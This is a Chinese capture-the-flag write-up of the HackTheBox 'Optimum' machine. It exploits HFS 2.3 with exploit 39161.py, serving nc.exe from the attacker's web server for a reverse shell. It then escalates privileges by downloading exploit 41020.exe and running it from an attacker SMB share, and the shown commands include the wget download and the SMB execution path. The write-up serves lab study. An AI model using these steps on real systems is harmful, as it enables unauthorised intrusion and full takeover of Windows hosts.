用msf做很快。这台靶机很多人做以及写的writeup都是msf。但针对oscp备考者,本篇文章不用msf

1、nmap

就一个80,提示是HFS 2.3

2、 hfs漏洞利用

直接搜searchsploit hfs

用python比较方便,就选择39161.py

打开py看看,有几处要修改。IP端口当然要改成自己的。看样子这是个直接弹shell到本机的py。另外我还看到代码里有nc,而且还是从本机的http里使用 nc.exe。



思路就是用python打开 自己的http服务器python -m SimpleHTTPServer 80,再把nc.exe放到服务器的路径里。你在哪个路径下打开,就把nc放到哪里。

按要求执行python 39161.py 10.10.10.8 80 看这脚本应该是多次调用,所以要多试几次

本机监听,收到shell

3、提权

接下来就是找提权漏洞了
可以先systeminfo查看系统版本信息,再用常用的这个工具

python windows-exploit-suggester.py --systeminfo info.txt --database 2020-04-08-mssb.xls

有挺多的,我试了几个都不行,浪费时间。。。。
最后这个行得通。

wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41020.exe

因为是Windows,所以习惯用smbserver 此处下载 的服务传送&执行,很方便。以前的文章里写过很多操作的方法了。
把41020.exe放到我本机的共享文件夹里。路径自己定。开启

python smbserver.py Share '/root/exp'

在shell里直接执行

\\10.10.14.57\share\41020.exe

直接搞定。。

hackthebox-optimum(考点:hfs/windows)不用msf相关推荐

  1. Windows不用虚拟机或双系统,轻松实现linux shell环境:gitforwindows

    windows缺少shell命令支持 用过Linux服务器分析数据的小伙伴,一定对Linux强大Shell命令所折服,经常会感觉windows缺少这些命令而感觉不方便. 还有想学习Linux Shel ...

  2. 服务器windows模拟linux环境,科学网—Windows不用虚拟机或双系统,轻松实现shell环境:gitforwindows - 刘永鑫的博文...

    windows缺少shell命令支持 用过Linux服务器分析数据的小伙伴,一定对Linux强大Shell命令所折服,经常会感觉windows缺少这些命令而感觉不方便. 还有想学习Linux Shel ...

  3. vulnhub-Brainpan (考点:windows exe和linux elf下的两种缓冲区溢出)

    这个靶机前面考exe文件的缓冲区溢出,后面的提权方法还有对linux-elf文件的缓冲区溢出.可以熟悉ollydbg &immunitydebugger & gdb 几个常用调试工具和 ...

  4. HackTheBox::Optimum

    0x00信息收集 nmap -Pn -sV 10.10.10.8 查看80端口的服务,得到使用的服务为HFS,且版本信息为2.3 通过expliot-db找到可利用的漏洞点 0x00 漏洞利用 下载相 ...

  5. Linux 隐藏Windows,如何在windows不用软件隐藏重要文件

    每个人电脑里面都有些秘密,但是别人需要使用你的电脑时,有可能会看到,但是我们又不想让别人发现时,我们可以将其隐藏,那么别人就不会看到了.360文件保险柜.腾讯电脑管家等等.使用软件繁琐软件过大还会拖慢 ...

  6. 专升本-计算机公共课考点(2)——Windows 7 操作系统

    专升本-计算机公共课考点分析 Windows 7 操作系统 26. 操作系统的概念 27. 操作系统的功能 28. 操作系统的主要特征 29. 操作系统的分类 30. 常用操作系统简介 31. Win ...

  7. 渗透测试 ( 3 ) --- Metasploit Framework ( MSF )

    白嫖 :https://zhuanlan.zhihu.com/p/449836479 :http://t.zoukankan.com/hxlinux-p-15787814.html :https:// ...

  8. 网络安全-木马入侵windows -msfvenom反弹shell(CMD)

    网络安全-木马入侵windows -msfvenom反弹shell(CMD) 前言 一,我也是初学者记录的笔记 二,可能有错误的地方,请谨慎 三,欢迎各路大神指教 四,任何文章仅作为学习使用 五,学习 ...

  9. windows API 串口编程参考

    *************************************************** 更多精彩,欢迎进入:http://shop115376623.taobao.com ****** ...

最新文章

  1. 自动编码器的评级预测
  2. C#判断文件是否存在方法
  3. 概率编程库Edward安装
  4. java 唯一id生成算法_分布式全局唯一ID生成方案之snowflake算法
  5. 数据结构:表达式之中缀转后缀
  6. libuv / 编译 libuv 1.30 过程说明(静态库)
  7. 从零开始构建一个的asp.net Core 项目(一)
  8. 程序员减压方法100%有效
  9. C++ opengl 纹理生成
  10. 回炉重造-数据结构之数组列表
  11. 获取当地天气_6 点起来看天气预报?正经人谁看天气预报,原来是为了看她
  12. java左右连接sql写法,join用不了了 sql语句写法,不用join
  13. C++自增自减运算符简单记录
  14. 6.6 AdaBoost实战
  15. 【语音播放】基于matlab GUI MP3设计【含Matlab源码 425期】
  16. kitti raw数据处理--跑vins
  17. Eviews9.0---软件安装
  18. 线性代数让我想想:两步得到二阶矩阵的逆
  19. 用tensorflow实现一个分形图制作
  20. 使用GF集进行构型综合的方法之总结

热门文章

  1. 华为员工利用Bug越权访问机密卖给第三方,获利1.6万元,被判有期徒刑一年
  2. 自有App小程序第三方微信授权登录的实现
  3. mariadb集群与nginx负载均衡配置--centos7版本
  4. Idea相关操作以及相关问题
  5. bzoj4774 修路
  6. 简报a4纸的html页面,简报模板
  7. java通过反射调用方法_Java_通过反射调用类中的方法
  8. 玩转群晖NAS套件系列五:Moments的安装与使用保姆级教程!
  9. 怎么把Android手机号码导入,手机联系人怎么导入?通讯录vcf导入安卓手机的方法...
  10. 可能是目前为止全网最好的介绍分布式系统原理的中文文档!